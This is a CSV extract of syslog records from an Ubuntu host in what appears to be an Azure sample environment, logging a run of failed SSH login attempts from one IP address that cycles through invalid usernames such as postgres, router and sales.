+2980,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:24,UbuntuDevEnv,2019-06-28 05:24:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2981,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:26,UbuntuDevEnv,2019-06-28 05:24:26,auth,UbuntuDevEnv,info,Failed password for invalid user Polycom from 193.201.224.232 port 37519 ssh2,95251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Polycom,193.201.224.2,37519,,
+2982,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:26,UbuntuDevEnv,2019-06-28 05:24:26,auth,UbuntuDevEnv,info,"Disconnecting invalid user Polycom 193.201.224.232 port 37519: Change of username or service not allowed: (Polycom,ssh-connection) -> (postgres,ssh-connection) [preauth]",95251,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Polycom,193.201.224.2,37519,,
+2983,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:28,UbuntuDevEnv,2019-06-28 05:24:27,auth,UbuntuDevEnv,info,Invalid user postgres from 193.201.224.232 port 43630,95275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,193.201.224.2,43630,,
+2984,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:28,UbuntuDevEnv,2019-06-28 05:24:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2985,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:28,UbuntuDevEnv,2019-06-28 05:24:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2986,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:30,UbuntuDevEnv,2019-06-28 05:24:30,auth,UbuntuDevEnv,info,Failed password for invalid user postgres from 193.201.224.232 port 43630 ssh2,95275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,193.201.224.2,43630,,
+2987,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:31,UbuntuDevEnv,2019-06-28 05:24:30,auth,UbuntuDevEnv,info,"Disconnecting invalid user postgres 193.201.224.232 port 43630: Change of username or service not allowed: (postgres,ssh-connection) -> (print2000,ssh-connection) [preauth]",95275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,193.201.224.2,43630,,
+2988,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:32,UbuntuDevEnv,2019-06-28 05:24:31,auth,UbuntuDevEnv,info,Invalid user print2000 from 193.201.224.232 port 7409,95295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,print2000,193.201.224.2,7409,,
+2989,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:32,UbuntuDevEnv,2019-06-28 05:24:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2990,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:32,UbuntuDevEnv,2019-06-28 05:24:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:34,UbuntuDevEnv,2019-06-28 05:24:33,auth,UbuntuDevEnv,info,Failed password for invalid user print2000 from 193.201.224.232 port 7409 ssh2,95295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,print2000,193.201.224.2,7409,,
+2992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:34,UbuntuDevEnv,2019-06-28 05:24:33,auth,UbuntuDevEnv,info,"Disconnecting invalid user print2000 193.201.224.232 port 7409: Change of username or service not allowed: (print2000,ssh-connection) -> (PRODDTA,ssh-connection) [preauth]",95295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,print2000,193.201.224.2,7409,,
+2993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:34,UbuntuDevEnv,2019-06-28 05:24:34,auth,UbuntuDevEnv,info,Invalid user PRODDTA from 193.201.224.232 port 12023,95303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,PRODDTA,193.201.224.2,12023,,
+2994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:34,UbuntuDevEnv,2019-06-28 05:24:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:34,UbuntuDevEnv,2019-06-28 05:24:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:37,UbuntuDevEnv,2019-06-28 05:24:36,auth,UbuntuDevEnv,info,Failed password for invalid user PRODDTA from 193.201.224.232 port 12023 ssh2,95303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,PRODDTA,193.201.224.2,12023,,
+2997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:37,UbuntuDevEnv,2019-06-28 05:24:36,auth,UbuntuDevEnv,info,"Disconnecting invalid user PRODDTA 193.201.224.232 port 12023: Change of username or service not allowed: (PRODDTA,ssh-connection) -> (PSEAdmin,ssh-connection) [preauth]",95303,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,PRODDTA,193.201.224.2,12023,,
+2998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:37,UbuntuDevEnv,2019-06-28 05:24:37,auth,UbuntuDevEnv,info,Invalid user PSEAdmin from 193.201.224.232 port 15218,95320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,PSEAdmin,193.201.224.2,15218,,
+2999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:37,UbuntuDevEnv,2019-06-28 05:24:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:37,UbuntuDevEnv,2019-06-28 05:24:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:40,UbuntuDevEnv,2019-06-28 05:24:39,auth,UbuntuDevEnv,info,Failed password for invalid user PSEAdmin from 193.201.224.232 port 15218 ssh2,95320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,PSEAdmin,193.201.224.2,15218,,
+3002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:40,UbuntuDevEnv,2019-06-28 05:24:40,auth,UbuntuDevEnv,info,"Disconnecting invalid user PSEAdmin 193.201.224.232 port 15218: Change of username or service not allowed: (PSEAdmin,ssh-connection) -> (public,ssh-connection) [preauth]",95320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,PSEAdmin,193.201.224.2,15218,,
+3003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:41,UbuntuDevEnv,2019-06-28 05:24:41,auth,UbuntuDevEnv,info,Invalid user public from 193.201.224.232 port 20549,95334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,public,193.201.224.2,20549,,
+3004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:41,UbuntuDevEnv,2019-06-28 05:24:41,auth,UbuntuDevEnv,info,Failed none for invalid user public from 193.201.224.232 port 20549 ssh2,95334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,public,193.201.224.2,20549,,
+3005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:42,UbuntuDevEnv,2019-06-28 05:24:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:42,UbuntuDevEnv,2019-06-28 05:24:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:43,UbuntuDevEnv,2019-06-28 05:24:43,auth,UbuntuDevEnv,info,Failed password for invalid user public from 193.201.224.232 port 20549 ssh2,95334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,public,193.201.224.2,20549,,
+3008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:47,UbuntuDevEnv,2019-06-28 05:24:46,auth,UbuntuDevEnv,info,"Disconnecting invalid user public 193.201.224.232 port 20549: Change of username or service not allowed: (public,ssh-connection) -> (radware,ssh-connection) [preauth]",95334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,public,193.201.224.2,20549,,
+3009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:51,UbuntuDevEnv,2019-06-28 05:24:51,auth,UbuntuDevEnv,info,Invalid user radware from 193.201.224.232 port 49679,95371,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radware,193.201.224.2,49679,,
+3010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:51,UbuntuDevEnv,2019-06-28 05:24:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95371,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:51,UbuntuDevEnv,2019-06-28 05:24:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95371,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:53,UbuntuDevEnv,2019-06-28 05:24:53,auth,UbuntuDevEnv,info,Failed password for invalid user radware from 193.201.224.232 port 49679 ssh2,95371,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radware,193.201.224.2,49679,,
+3013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:55,UbuntuDevEnv,2019-06-28 05:24:54,auth,UbuntuDevEnv,info,"Disconnecting invalid user radware 193.201.224.232 port 49679: Change of username or service not allowed: (radware,ssh-connection) -> (rapport,ssh-connection) [preauth]",95371,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radware,193.201.224.2,49679,,
+3014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:56,UbuntuDevEnv,2019-06-28 05:24:55,auth,UbuntuDevEnv,info,Invalid user rapport from 193.201.224.232 port 61270,95385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rapport,193.201.224.2,61270,,
+3015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:56,UbuntuDevEnv,2019-06-28 05:24:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:56,UbuntuDevEnv,2019-06-28 05:24:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:58,UbuntuDevEnv,2019-06-28 05:24:58,auth,UbuntuDevEnv,info,Failed password for invalid user rapport from 193.201.224.232 port 61270 ssh2,95385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rapport,193.201.224.2,61270,,
+3018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:24:59,UbuntuDevEnv,2019-06-28 05:24:58,auth,UbuntuDevEnv,info,"Disconnecting invalid user rapport 193.201.224.232 port 61270: Change of username or service not allowed: (rapport,ssh-connection) -> (rcust,ssh-connection) [preauth]",95385,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rapport,193.201.224.2,193,,
+3019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:03,UbuntuDevEnv,2019-06-28 05:25:02,auth,UbuntuDevEnv,info,Invalid user rcust from 193.201.224.232 port 24855,95406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rcust,193.201.224.2,24855,,
+3020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:03,UbuntuDevEnv,2019-06-28 05:25:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:03,UbuntuDevEnv,2019-06-28 05:25:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:04,UbuntuDevEnv,2019-06-28 05:25:03,auth,UbuntuDevEnv,info,Failed password for invalid user rcust from 193.201.224.232 port 24855 ssh2,95406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rcust,193.201.224.2,24855,,
+3023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:04,UbuntuDevEnv,2019-06-28 05:25:04,auth,UbuntuDevEnv,info,"Disconnecting invalid user rcust 193.201.224.232 port 24855: Change of username or service not allowed: (rcust,ssh-connection) -> (router,ssh-connection) [preauth]",95406,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rcust,193.201.224.2,24855,,
+3024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:05,UbuntuDevEnv,2019-06-28 05:25:05,auth,UbuntuDevEnv,info,Invalid user router from 193.201.224.232 port 31909,95425,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,router,193.201.224.2,31909,,
+3025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:05,UbuntuDevEnv,2019-06-28 05:25:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95425,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:05,UbuntuDevEnv,2019-06-28 05:25:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95425,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:07,UbuntuDevEnv,2019-06-28 05:25:07,auth,UbuntuDevEnv,info,Failed password for invalid user router from 193.201.224.232 port 31909 ssh2,95425,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,router,193.201.224.2,31909,,
+3028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:08,UbuntuDevEnv,2019-06-28 05:25:07,auth,UbuntuDevEnv,info,"Disconnecting invalid user router 193.201.224.232 port 31909: Change of username or service not allowed: (router,ssh-connection) -> (RSBCMON,ssh-connection) [preauth]",95425,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,router,193.201.224.2,31909,,
+3029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:13,UbuntuDevEnv,2019-06-28 05:25:12,auth,UbuntuDevEnv,info,Invalid user RSBCMON from 193.201.224.232 port 35610,95442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,RSBCMON,193.201.224.2,35610,,
+3030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:13,UbuntuDevEnv,2019-06-28 05:25:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:13,UbuntuDevEnv,2019-06-28 05:25:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:15,UbuntuDevEnv,2019-06-28 05:25:15,auth,UbuntuDevEnv,info,Failed password for invalid user RSBCMON from 193.201.224.232 port 35610 ssh2,95442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,RSBCMON,193.201.224.2,35610,,
+3033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:19,UbuntuDevEnv,2019-06-28 05:25:19,auth,UbuntuDevEnv,info,"Disconnecting invalid user RSBCMON 193.201.224.232 port 35610: Change of username or service not allowed: (RSBCMON,ssh-connection) -> (sales,ssh-connection) [preauth]",95442,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,RSBCMON,193.201.224.2,35610,,
+3034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:20,UbuntuDevEnv,2019-06-28 05:25:20,auth,UbuntuDevEnv,info,Invalid user sales from 193.201.224.232 port 8678,95477,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sales,193.201.224.2,8678,,
+3035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:20,UbuntuDevEnv,2019-06-28 05:25:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,95477,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:20,UbuntuDevEnv,2019-06-28 05:25:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95477,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:25:22,UbuntuDevEnv,2019-06-28 05:25:21,auth,UbuntuDevEnv,info,Failed password for invalid user sales from 193.201.224.232 port 8678 ssh2,95477,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sales,193.201.224.2,8678,,
